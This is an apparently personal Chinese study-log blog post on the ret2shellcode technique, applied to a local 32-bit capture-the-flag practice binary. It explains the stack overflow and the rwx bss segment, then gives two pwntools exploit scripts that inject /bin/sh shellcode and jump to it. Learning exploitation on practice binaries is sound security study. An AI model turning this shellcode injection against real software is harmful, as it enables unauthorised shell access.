每日一结【第2天】
这年头果然不能随便立flag,随便有点啥事都能给耽误了,今天继续
二进制保护机制:http://www.mamicode.com/info-detail-1990426.html
ret2shellcode
原理:
ret2shellcode需要我们控制程序执行shellcode代码。而所谓的shellcode指的是用于完成某个功能的汇编代码,常见的功能主要是获取目标系统的shell。一般来说,shellcode都需要我们自己去填充。这其实是另外一种典型的利用的方法,即此时我们需要自己去填充一些可执行的代码。而在栈溢出的基础上,我们一般都是向栈中写内容,所以要想执行shellcode,需要对应的binary文件没有开启NX保护。
样例:ret2shellcode
第一步,先运行一下程序,顺道查看一下保护机制(偷个懒,不放那么多图了)
我们可以看到这个程序也是让输入一串字符,是32位程序,而且没有开启任何保护
然后扔进IDA里看一下,和上一题一样,存在栈溢出漏洞,我们双击buf2就会来到bss段,地址是0x0804A080(关于bss段戳这里)
OK,现在大概已经了解一些了,使用上一次的方法调试一波,然后可得知输入的第一个字节距离ebp108个字节,距离ret地址112个字节
这个时候本次的重点来啦!!!
我们使用vmmap指令查看一下程序的内存,非(yi)常(liao)意(zhi)外(zhong)的发现,这个程序的bss段具有rwx权限,这就很令人开心啦,我们这次可以使用和上次不一样的方法
这一次,因为程序的bss段的权限足够,所以我们可以把shellcode直接布置到栈上,然后控制程序去执行
exp:
from pwn import *
r = process('./ret2shellcode')
shellcode = "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73"
shellcode += "\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0"
shellcode += "\x0b\xcd\x80"
buf2_addr = 0x804a080
r.sendline(shellcode.ljust(112, 'A') + p32(buf2_addr))
r.interactive()
执行结果:
这里还有一份exp,不过不知道为啥我这边执行总是出错,大家有兴趣可以看一下
exp:
from pwn import *
r = process('./ret2shellcode')
shellcode = asm(shellcraft.sh())
buf2_addr = 0x804a080
r.sendline(shellcode.ljust(112, 'A') + p32(buf2_addr))
r.interactive()